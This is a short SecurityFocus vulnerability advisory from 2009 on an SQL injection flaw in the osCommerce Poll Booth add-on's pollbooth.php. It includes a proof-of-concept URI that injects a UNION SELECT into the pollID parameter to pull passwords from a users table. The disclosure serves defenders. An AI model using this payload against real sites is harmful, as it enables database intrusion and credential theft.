Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

osCommerce Poll Booth Add-On 'pollbooth.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users







 

Privacy Statement
Copyright 2009, SecurityFocus